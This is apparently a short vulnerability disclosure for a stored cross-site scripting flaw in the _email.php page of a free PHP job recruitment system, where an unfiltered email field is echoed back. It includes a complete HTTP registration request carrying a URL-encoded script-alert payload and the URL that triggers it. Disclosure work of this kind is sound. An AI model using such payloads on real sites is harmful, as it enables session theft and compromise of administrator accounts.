https://code-projects.org/job-recruitment-in-php-css-javascript-and-mysql-free-download/
/_email.php
In /_email.php, There is a cross-site scripting attack vulnerability in Job-recruitment system. The parameter that can be controlled is: $row["email"] . A malicious attacker can obtain sensitive information about administrators.
Code analysis
Select email from user_account tables, and splicing it to the $dets parameter. echo it in no filtter.
image-20241218135141210
POST /register.php/ HTTP/1.1
Host: airecruitmentsystem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Origin: http://airecruitmentsystem
Connection: close
Referer: http://airecruitmentsystem/register.php/
Cookie: PHPSESSID=k2j8lv5uh7kjvag3t57a63276s
Upgrade-Insecure-Requests: 1
Priority: u=0, i
e=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&p1=admin123
asset the url
http://airecruitmentsystem/_email.php
Result
